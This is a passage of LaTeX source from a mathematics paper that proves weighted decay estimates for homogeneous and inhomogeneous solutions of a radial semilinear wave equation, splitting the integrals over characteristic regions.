by \eqref{Eq:I_p_2} and \eqref{Eq:I_p_3} we see
\begin{Eq*}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(t-r-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim r^{\frac{A-1}{2}}(t-r-\rho)^{\frac{1-A}{2}}.
\end{Eq*}
Then we have
\begin{Eq*}
|J_{0}|\lesssim& \int_{0}^{t-r}(t-r-\rho)^{\frac{1-A}{2}} \rho^{\frac{A-3}{2}}\rho|g(\rho)|\d\rho\\
\lesssim&\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
In the region of $\Omega_1$ where $\mu>-1$, by \eqref{Eq:I_p_3} we see
\begin{Eq*}
|I_A(\mu)|\lesssim (1+\mu)^{\frac{A-3}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(r+\rho-t)}\kr)^{\frac{3-A}{2}}
\lesssim \rho^{\frac{3-A}{2}}(r+\rho-t)^{\frac{A-3}{2}}.
\end{Eq*}
Thus we get
\begin{Eq*}
|J_{1}|\lesssim& r^{\frac{1-A}{2}}\int_{|t-r|}^{t+r}(r+\rho-t)^{\frac{A-3}{2}} \rho|g(\rho)|\d\rho\\
\lesssim&\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
\subpart[$t+r\geq 4$, $-1\leq t-r\leq 2$]
In this part, we have $\kl<t-r\kr>\approx 1$ and $r\approx \kl<t+r\kr>$.
In the region of $\Omega_0$ where $\mu<-1$, we have
\begin{Eq*}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(t-r-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \rho^{\frac{A-1}{2}}(t-r-\rho)^{\frac{1-A}{2}}.
\end{Eq*}
Then we get
\begin{Eq*}
|J_{0}|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\int_{0}^{t-r}(t-r-\rho)^{\frac{1-A}{2}} \rho^{A-2}\rho|g(\rho)|\d\rho\\
\lesssim&\kl<t+r\kr>^{\frac{1-A}{2}}(t-r)^{\frac{A-1}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
In the region of $\Omega_1$ where $\mu>-1$, we also have
\begin{Eq*}
|I_A(\mu)|\lesssim (1+\mu)^{\frac{A-3}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(r+\rho-t)}\kr)^{\frac{3-A}{2}}
\lesssim \rho^{\frac{3-A}{2}}(r+\rho-t)^{\frac{A-3}{2}}.
\end{Eq*}
Then we see
\begin{Eq*}
|J_{1}|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\int_{|t-r|}^{2}(r+\rho-t)^{\frac{A-3}{2}} \rho|g(\rho)|\d\rho\\
\lesssim&\kl<t+r\kr>^{\frac{1-A}{2}}(r+2-t)^{\frac{A-1}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}
\lesssim\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
\subpart[$t+r\geq 4$, $t-r\geq 2$]
In this part, we have $t+r\gtrsim\kl<t+r\kr>$ and $t-r-1\gtrsim\kl<t-r\kr>$. Here $\Omega_1=\emptyset$, so we only need to consider $\Omega_0$, where $\mu<-1$. Again we see
\begin{Eq*}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r+\rho)(t-r-\rho)}\kr)^{\frac{A-1}{2}}\\
\lesssim& r^{\frac{A-1}{2}}\rho^{\frac{A-1}{2}}\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}.
\end{Eq*}
Then we have
\begin{Eq*}
|u_g|\lesssim& \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\int_{0}^{1} \rho^{A-1}|g(\rho)|\d\rho\\
\lesssim&\kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho g(\rho)\kr\|_{L^\infty}.
\end{Eq*}
In summary, we finish the estimate of $u_g$ when $A<3$.
\value{parta}[Estimate of $u_f$ with $A\in[2,3)$]
Next we consider $u_f$. For simplicity let $u_{g=\phi}$ stand for $u_g$ with $g=\phi$.
By \Le{Le:u_e} and the expression of $u_g$ \eqref{Eq:u_g_c}, we know
\begin{Eq*}
u_f=&\partial_t \kl(u_{g=f}\kr)\\
=&\frac{1}{\Gamma\kl(\frac{A-1}{2}\kr)\Gamma\kl(\frac{3-A}{2}\kr)} \partial_t\kl(t\int_{0}^{1}\int_{-1}^{1} \frac{f\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)}{(1-\sigma^2)^{\frac{A-1}{2}}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\kr)\\
\lesssim &t\int_{0}^{1}\int_{-1}^{1} \frac{\kl|t\sigma^2-r\sigma\lambda\kr|}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}}\frac{\kl|f'\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)\kr|}{(1-\sigma^2)^{\frac{A-1}{2}}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\\
&+\int_{0}^{1}\int_{-1}^{1} \frac{\kl|f\kl(\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}\kr)\kr|}{(1-\sigma^2)^{\frac{A-1}{2}}}\sigma^{A-1}\sqrt{1-\lambda^2}^{A-3}\d \lambda\d\sigma\\
\equiv&H_1+H_2.
\end{Eq*}
Since $A\in[2,3)$, we can easily find that $H_2\lesssim \|f\|_{L^\infty}$. Meanwhile, we find that
\begin{Eq*}
H_2\approx&t^{-1}u_{g=|f|}\lesssim t^{-1} \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\|f(\rho)\|_{L_\rho^\infty}.
\end{Eq*}
Combining these two bounds, using the first for $t\leq 1$ and the second for $t\geq 1$, we finish the estimate of $H_2$. Next we consider $H_1$. Notice that for $\lambda\in[-1,1]$ we have
\begin{Eq*}
\kl(\frac{t\sigma^2-r\sigma\lambda}{\sqrt{r^2+t^2\sigma^2-2rt\sigma\lambda}}\kr)^2=&\frac{r^2\sigma^2\lambda^2+t^2\sigma^4-2rt\sigma^3\lambda}{r^2+t^2\sigma^2-2rt\sigma\lambda}\leq\sigma^2\leq 1.
\end{Eq*}
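To verify the last inequality, note that the denominator satisfies $r^2+t^2\sigma^2-2rt\sigma\lambda=(r-t\sigma\lambda)^2+t^2\sigma^2(1-\lambda^2)\geq 0$, and clearing it we find
\begin{Eq*}
\sigma^2\kl(r^2+t^2\sigma^2-2rt\sigma\lambda\kr)-\kl(r^2\sigma^2\lambda^2+t^2\sigma^4-2rt\sigma^3\lambda\kr)=r^2\sigma^2(1-\lambda^2)\geq 0.
\end{Eq*}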
Then we calculate
\begin{Eq*}
H_1\lesssim u_{g=|f'|}\lesssim \kl<t+r\kr>^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{1-A}{2}}\kl\|\rho f'(\rho)\kr\|_{L_\rho^\infty}.
\end{Eq*}
Combining the estimates of $H_1$ and $H_2$, we finish the estimate of $u_f$ when $A<3$.
\value{parta}[Estimate of $u_g$ and $u_f$ for $A=3$]
When $A=3$, the estimate for $u_g$ is similar; we use \eqref{Eq:I_p_5} and \eqref{Eq:I_p_6} instead of \eqref{Eq:I_p_2} and \eqref{Eq:I_p_3}. As for $u_f$, we easily calculate
\begin{Eq*}
u_f=\frac{(t+r)f(t+r)-(t-r)f(|t-r|)}{2r}
\end{Eq*}
with $\supp u_f\subset \{(t,r):|t-r|\leq 1\}$. When $r< t$, by the mean value theorem we see
\begin{Eq*}
|u_f|=\kl|\frac{(t+r)f(t+r)-(t-r)f(t-r)}{2r}\kr|\leq \|\partial_\rho(\rho f(\rho))\|_{L_\rho^\infty}.
\end{Eq*}
When $t<r$, we see
\begin{Eq*}
|u_f|\leq|f(t+r)|+|f(r-t)|\lesssim \|f(\rho)\|_{L_\rho^\infty}.
\end{Eq*}
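For completeness, the explicit formula above is d'Alembert's formula in disguise: when $A=3$, $w:=ru_f$ solves the one dimensional wave equation with data $w(0,\rho)=\phi(\rho):=\rho f(|\rho|)$ (the odd extension of $\rho f(\rho)$) and $w_t(0,\rho)=0$, so that
\begin{Eq*}
ru_f(t,r)=\frac{\phi(r+t)+\phi(r-t)}{2}=\frac{(t+r)f(t+r)-(t-r)f(|t-r|)}{2}.
\end{Eq*}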
In summary, we obtain the desired estimate of $u_g$ and $u_f$ for $A=3$, and finish the proof of \Le{Le:u0_e}.
\end{proof}
\subsection{Estimate for non-homogeneous solution}
In this subsection, we take vanishing initial data and estimate the solution of the nonlinear equation \eqref{Eq:u_o}. For simplicity, we shift the time variable and consider the equation
\begin{Eq}\label{Eq:v_o}
\begin{cases}
\kl(\partial_t^2-\partial_r^2-(A-1)r^{-1}\partial_r\kr)v(t,r)=r^{\frac{(A-n)p+n-A}{2}}G(t,r)\\
v(4,r)=0,\qquad v_t(4,r)=0.
\end{cases}
\end{Eq}
\begin{lemma}\label{Le:v_e}
Define $\Omega:=\{(t,r)\in [4,\infty)\times {\mathbb{R}}_+: t>r+2\}$ and $\Lambda(t,r):=\{(s,\rho)\in\Omega:s+\rho<t+r,s-\rho<t-r\}$. If $v$ solves the equation \eqref{Eq:v_o} with $\supp v\subset \Omega$, then for any $(t,r)\in\Omega$ and $k=1,2,3$ we have
\begin{Eq}\label{Eq:v_e}
\kl<t+r\kr>^{\frac{A-1}{2}} |v|\lesssim N_k(t-r)\|\omega_k^p G\|_{L_{s,\rho}^\infty(\Lambda)}.
\end{Eq}
Here
\begin{Eq*}
\omega_k(t,r):=&\kl<t+r\kr>^{\frac{A-1}{2}}\beta_k(t-r),\qquad k=1,2,3;\\
\beta_k(t-r):=&\begin{cases}
\kl<t-r\kr>^{\frac{A-1}{2}},&k=1,\ \text{for }p_m<p<p_M,\\
\kl<t-r\kr>^{\frac{(n-1)p-n-1}{2}},& k=2,\ \text{for }p_m<p<p_t,\\
\kl<t-r\kr>^{\frac{A-1}{2}}(\ln\kl<t-r\kr>)^{-1},&k=3,\ \text{for }p=p_t>p_d;
\end{cases}
\end{Eq*}
\begin{Eq*}
N_1(t-r):=&\begin{cases}
\kl<t-r\kr>^{\frac{1-A}{2}},&p>\max(p_d,p_t)\ \text{or}\ p=p_d>p_t\ \text{or}\ p_F<p<p_d,\\
\kl<t-r\kr>^{\frac{1-A}{2}}\ln\kl<t-r\kr>,&p=p_t>p_d\ \text{or}\ p=p_F<p_d,\\
\kl<t-r\kr>^\frac{(1-n)p+n+1}{2},&p_d<p<p_t,\\
\kl<t-r\kr>^\frac{(-n-A+2)p+n+3}{2},&p<\min(p_d,p_F),\\
\kl<t-r\kr>^{\frac{(-n-A+2)p+n+3}{2}}\ln\kl<t-r\kr>,& p=p_d< p_t,\\
\kl<t-r\kr>^{\frac{1-A}{2}} (\ln \kl<t-r\kr>)^2,& p=p_d= p_t;
\end{cases}\\
N_2(t-r):=&\begin{cases}
\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}},&p_S<p<p_t,\\
\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}}\ln \kl<t-r\kr>,&p=p_S<p_t,\\
\kl<t-r\kr>^{\frac{(1-n)p^2+2p+n+3}{2}},&p_m<p<\min(p_S,p_t);
\end{cases}\\
N_3(t-r):=&
\kl<t-r\kr>^{\frac{1-A}{2}}\ln\kl<t-r\kr>,\qquad p=p_t>p_d.
\end{Eq*}
\end{lemma}
\begin{remark}
By the definition of $\beta_k$, we can easily find that for any $\xi, \eta>2$
with $\xi/\eta\in (1/2, 2)$, we have
\begin{Eq*}
\beta_k(\xi)\approx \beta_k(\eta).
\end{Eq*}
Also if $2<\eta_1<\eta_2$, we have
\begin{Eq*}
\beta_k(\eta_1)\lesssim\beta_k(\eta_2).
\end{Eq*}
\end{remark}
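Indeed, up to constants each $\beta_k$ is nondecreasing for large argument: the exponent of $\beta_1$ is positive, the exponent $\frac{(n-1)p-n-1}{2}$ of $\beta_2$ is positive for $p>p_m$, and for $\beta_3$ one checks
\begin{Eq*}
\frac{\d}{\d \eta}\frac{\eta^{\frac{A-1}{2}}}{\ln\eta}=\frac{\eta^{\frac{A-3}{2}}}{\ln\eta}\kl(\frac{A-1}{2}-\frac{1}{\ln\eta}\kr)>0,\qquad \eta>e^{\frac{2}{A-1}}.
\end{Eq*}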
\begin{proof}[Proof of \Le{Le:v_e}]
Using \Le{Le:u_e}, we find
\begin{Eq*}
v=r^{\frac{1-A}{2}} \int_{\Lambda} I_A(\mu) \rho^{\frac{(A-n)p+n-1}{2}}G(s,\rho)\d\rho\d s,
\end{Eq*}
with $\mu:=\frac{r^2+\rho^2-(t-s)^2}{2 r \rho}$. To reach \eqref{Eq:v_e}, we calculate
\begin{Eq*}
|\kl<t+r\kr>^\frac{A-1}{2} v|\leq& r^{\frac{1-A}{2}}\kl<t+r\kr>^\frac{A-1}{2} \|\omega_k^p G\|_{L_{s,\rho}^\infty (\Lambda)}\int_{\Lambda} |I_A(\mu)| \rho^{\frac{(A-n)p+n-1}{2}}\omega_k^{-p}\d\rho\d s.
\end{Eq*}
Thus, we only need to show that
\begin{Eq}\label{Eq:Jijk}
J_{ij;k}:=r^{\frac{1-A}{2}}\kl<t+r\kr>^\frac{A-1}{2} \int_{\Lambda_{ij}} |I_A(\mu)|\rho^{\frac{(A-n)p+n-1}{2}}\omega_k^{-p}\d\rho\d s\lesssim N_k(t-r)
\end{Eq}
for $i=1,2,3$, $j=1,2$ with
\begin{Eq*}
\Lambda_{11}:=&\{(s,\rho)\in\Lambda: s+\rho\in(t-r,t+r), \rho\leq s/2\};\\
\Lambda_{12}:=&\{(s,\rho)\in\Lambda: s+\rho\in(t-r,t+r), \rho\geq s/2\};\\
\Lambda_{21}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(\frac{t-r}{2},t-r\kr), \rho\leq s/2\};\\
\Lambda_{22}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(\frac{t-r}{2},t-r\kr), \rho\geq s/2\};\\
\Lambda_{31}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(3,\frac{t-r}{2}\kr), \rho\leq s/2\};\\
\Lambda_{32}:=&\{(s,\rho)\in\Lambda: s+\rho\in\kl(3,\frac{t-r}{2}\kr), \rho\geq s/2\}.
\end{Eq*}
\begin{figure}[H]
\centering
\includegraphics[width=0.99\textwidth]{Omega.png}
\end{figure}
It is easy to check that
\begin{Eq}\label{Eq:srho_r}
\begin{cases}
s+\rho\leq 3(s-\rho)\leq 3(s+\rho),&(s,\rho)\in \Lambda_{11}\cup\Lambda_{21}\cup\Lambda_{31},\\
s+\rho\leq 3\rho\leq 3(s+\rho),&(s,\rho)\in \Lambda_{12}\cup\Lambda_{22}\cup\Lambda_{32}.
\end{cases}
\end{Eq}
Then, a quick calculation shows
\begin{Eq}\label{Eq:trsrho_r}
\begin{cases}
t-r\leq s+\rho \leq \min\{t+r,3(t-r)\}, \quad (t-r)/3\leq s-\rho\leq t-r, &(s,\rho)\in \Lambda_{11},\\
t-r\leq s+\rho\leq t+r,\quad 2\leq s-\rho\leq \min\{(t+r)/3,t-r\}, &(s,\rho)\in \Lambda_{12},\\
(t-r)/2\leq s+\rho \leq t-r, \quad (s+\rho)/3\leq s-\rho\leq s+\rho, &(s,\rho)\in \Lambda_{21},\\
(t-r)/2\leq s+\rho\leq t-r,\quad 2\leq s-\rho\leq (t-r)/3, &(s,\rho)\in \Lambda_{22},\\
4\leq s+\rho \leq (t-r)/2, \quad (s+\rho)/3\leq s-\rho\leq s+\rho, &(s,\rho)\in \Lambda_{31},\\
6\leq s+\rho\leq (t-r)/2,\quad 2\leq s-\rho\leq (s+\rho)/3, &(s,\rho)\in \Lambda_{32}.
\end{cases}
\end{Eq}
From now on, we introduce $\xi:=s+\rho$ and $\eta:=s-\rho$.
We will use \eqref{Eq:srho_r} and \eqref{Eq:trsrho_r} freely in each region.
\setcounter{part0}{0}
\value{parta}[Preparation for $A\in[2,3)$ with $r\leq t/2$]
We first consider $A\in[2,3)$. Notice that $\mu=\frac{r^2+\rho^2-(t-s)^2}{2r\rho}< -1$ when $s+\rho< t-r$, and $\mu> -1$ when $s+\rho> t-r$.
In this part we have
\begin{Eq*}
t+r\leq 3(t-r)\leq 3(t+r).
\end{Eq*}
In the region of $\Lambda_{11}$,
using \eqref{Eq:I_p_3} we have
\begin{Eq}\label{Eq:I_e1}
|I_A(\mu)|\lesssim& (1+\mu)^{\frac{A-3}{2}}
=\kl(\frac{2r\rho}{(r+\rho+t-s)(r+\rho-t+s)}\kr)^{\frac{3-A}{2}}
\lesssim \kl(\frac{\rho}{r+\rho-t+s}\kr)^{\frac{3-A}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{11}\lesssim & r^{\frac{1-A}{2}} \kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{11}} \rho^{\frac{(A-n)p+n-A+2}{2}}\kl<s+\rho\kr>^{-\frac{A-1}{2}p}\beta(s+\rho)^{-p}\kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\lesssim &r^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{(1-A)p+A-1}{2}}\beta(t-r)^{-p}\int_{t-r}^{t+r}\int_{(t-r)/3}^{t-r} (\xi-\eta)^{\frac{(A-n)p+n-A+2}{2}}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d \eta\d\xi\\
\lesssim& r^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p}\int_{t-r}^{t+r}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
where we noticed that $\frac{(A-n)p+n-A+2}{2}> -1$ since $p<p_M$.
In the region of $\Lambda_{12}$, we also have \eqref{Eq:I_e1}. Then we find
\begin{Eq*}
J_{12}\lesssim & r^{\frac{1-A}{2}} \kl<t-r\kr>^{\frac{A-1}{2}}\int_{\Lambda_{12}}\kl<s+\rho\kr>^{\frac{(1-n)p+n-A+2}{2}}\beta(s-\rho)^{-p}\kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\lesssim & r^{\frac{1-A}{2}}\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}}\int_{t-r}^{t+r}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi \int_2^{(t+r)/3} \beta(\eta)^{-p}\d\eta\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{t-r} \beta(\eta)^{-p}\d\eta.
\end{Eq*}
In the region of $\Lambda_{21}$,
using \eqref{Eq:I_p_2} and \eqref{Eq:I_p_3}
we have
\begin{Eq}\label{Eq:I_e2}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \kl(\frac{r}{t-r-s-\rho}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{21}\lesssim & \kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{21}} \rho^{\frac{(A-n)p+n-1}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{(1-A)p+A-1}{2}}\beta(t-r)^{-p} \int_{(t-r)/2}^{t-r}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n-1}{2}}\kl({t-r-\xi}\kr)^{\frac{1-A}{2}}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\beta(t-r)^{-p} \int_{(t-r)/2}^{t-r} \kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
where we require $p<p_M$ to ensure that $\frac{(A-n)p+n-1}{2}> -1$.
In the region of $\Lambda_{22}$, we still have
\eqref{Eq:I_e2}. Then we find
\begin{Eq*}
J_{22}\lesssim & \kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{22}}\kl<s+\rho\kr>^{\frac{(1-n)p+n-1}{2}}\beta(s-\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim & \kl<t-r\kr>^{\frac{(1-n)p+n+A-2}{2}}\int_{(t-r)/2}^{t-r}\kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi \int_2^{(t-r)/3}\beta(\eta)^{-p}\d\eta\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{(t-r)/3} \beta(\eta)^{-p}\d\eta.
\end{Eq*}
In the region of $\Lambda_{31}$
we have
\begin{Eq}\label{Eq:I_e3}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim\kl(\frac{r\rho}{(t-r)^2}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{31}\lesssim &\kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{31}} \rho^{\frac{(A-n)p+n+A-2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r}\kr)^{-A+1}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_4^{(t-r)/2}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n+A-2}{2}}\kl<\xi\kr>^{\frac{(1-A)p}{2}}\beta(\xi)^{-p}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_4^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A}{2}}\beta(\xi)^{-p} \d\xi,
\end{Eq*}
where we noticed that $\frac{(A-n)p+n+A-2}{2}>-1$ since $p<p_M$.
In the region of $\Lambda_{32}$ we still have \eqref{Eq:I_e3}.
Then we find
\begin{Eq*}
J_{32}\lesssim &\kl<t-r\kr>^{\frac{A-1}{2}} \int_{\Lambda_{32}}\kl<s+\rho\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(s-\rho)^{-p}\kl({t-r}\kr)^{-A+1}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}}\int_6^{(t-r)/2}\int_2^{\xi/3}\kl<\xi\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(\eta)^{-p}\d \eta\d\xi.
\end{Eq*}
\value{parta}[Preparation for $A\in[2,3)$ with $r\geq t/2$]
In this part we have
\begin{Eq*}
t+r\leq 3r\leq 3(t+r).
\end{Eq*}
In the region of $\Lambda_{11}$, we have \eqref{Eq:I_e1}.
Then we find
\begin{Eq*}
J_{11}'\lesssim & \int_{\Lambda_{11}} \rho^{\frac{(A-n)p+n-A+2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{(1-A)p}{2}}\beta(t-r)^{-p} \int_{t-r}^{3(t-r)}\int_{(t-r)/3}^{t-r} (\xi-\eta)^{\frac{(A-n)p+n-A+2}{2}}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n-A+4}{2}}\beta(t-r)^{-p} \int_{t-r}^{3(t-r)}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi\\
\lesssim&\kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
again $\frac{(A-n)p+n-A+2}{2}> -1$ since $p<p_M$.
In the region of $\Lambda_{12}$, we have \eqref{Eq:I_e1}.
Then we find
\begin{Eq*}
J_{12}'\lesssim & \int_{\Lambda_{12}}\kl<s+\rho\kr>^{\frac{(1-n)p+n-A+2}{2}}\beta(s-\rho)^{-p} \kl({r+\rho-t+s}\kr)^{\frac{A-3}{2}}\d\rho\d s\\
\leq & \int_{t-r}^{t+r}\kl<\xi\kr>^{\frac{(1-n)p+n-A+2}{2}}\kl({\xi-(t-r)}\kr)^{\frac{A-3}{2}}\d\xi \int_2^{t-r} \beta(\eta)^{-p}\d\eta\\
\lesssim &
\kl(\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} +\int_{3(t-r)}^{t+r}\kl<\xi\kr>^{\frac{(1-n)p+n-1}{2}}\d\xi\kr)\int_2^{t-r} \beta(\eta)^{-p}\d\eta\\
\lesssim & \kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{t-r} \beta(\eta)^{-p}\d\eta,
\end{Eq*}
where we require $p>p_m$ so that $\frac{(1-n)p+n-1}{2}<-1$.
In the region of $\Lambda_{21}$ we have
\begin{Eq}\label{Eq:I_e4}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \kl(\frac{\rho}{t-r-s-\rho}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{21}'\lesssim & \int_{\Lambda_{21}} \rho^{\frac{(A-n)p+n+A-2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\leq &\kl<t-r\kr>^{\frac{(1-A)p}{2}}\beta(t-r)^{-p}\int_{(t-r)/2}^{t-r}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n+A-2}{2}}\kl({t-r-\xi}\kr)^{\frac{1-A}{2}}\d \eta\d\xi\\
\lesssim& \kl<t-r\kr>^{\frac{(1-n)p+n+A}{2}}\beta(t-r)^{-p}\int_{(t-r)/2}^{t-r} \kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi\\
\lesssim& \kl<t-r\kr>^{\frac{(1-n)p+n+3}{2}}\beta(t-r)^{-p},
\end{Eq*}
where $\frac{(A-n)p+n+A-2}{2}>-1$ since $p<p_M$.
In the region of $\Lambda_{22}$, we have \eqref{Eq:I_e4}.
Then we find
\begin{Eq*}
J_{22}'\lesssim & \int_{\Lambda_{22}}\kl<s+\rho\kr>^{\frac{(1-n)p+n+A-2}{2}}\beta(s-\rho)^{-p}\kl({t-r-s-\rho}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\leq &\kl<t-r\kr>^{\frac{(1-n)p+n+A-2}{2}}\int_{(t-r)/2}^{t-r}\kl(t-r-\xi\kr)^{\frac{1-A}{2}}\d\xi \int_2^{(t-r)/3} \beta(\eta)^{-p}\d\eta\\
\lesssim &\kl<t-r\kr>^{\frac{(1-n)p+n+1}{2}} \int_2^{(t-r)/3} \beta(\eta)^{-p}\d\eta.
\end{Eq*}
In the region of $\Lambda_{31}$, we have
\begin{Eq}\label{Eq:I_e5}
|I_A(\mu)|\lesssim& (-1-\mu)^{\frac{1-A}{2}}
=\kl(\frac{2r\rho}{(t+r-s+\rho)(t-r-s-\rho)}\kr)^{\frac{A-1}{2}}
\lesssim \kl(\frac{\rho}{t-r}\kr)^{\frac{A-1}{2}}.
\end{Eq}
Then we find
\begin{Eq*}
J_{31}'\lesssim & \int_{\Lambda_{31}} \rho^{\frac{(A-n)p+n+A-2}{2}}\kl<s+\rho\kr>^{\frac{(1-A)p}{2}}\beta(s+\rho)^{-p}\kl({t-r}\kr)^{\frac{1-A}{2}}\d\rho\d s\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}} \int_4^{(t-r)/2}\int_{\xi/3}^{\xi} (\xi-\eta)^{\frac{(A-n)p+n+A-2}{2}}\kl<\xi\kr>^{\frac{(1-A)p}{2}}\beta(\xi)^{-p}\d \eta\d\xi\\
\lesssim &\kl<t-r\kr>^{\frac{1-A}{2}} \int_4^{(t-r)/2}\kl<\xi\kr>^{\frac{(1-n)p+n+A}{2}}\beta(\xi)^{-p}\d\xi,
\end{Eq*}
where $\frac{(A-n)p+n+A-2}{2}>-1$ since $p<p_M$.
In the region of $\Lambda_{32}$, we have \eqref{Eq:I_e5}.
Then we find
\begin{Eq*}
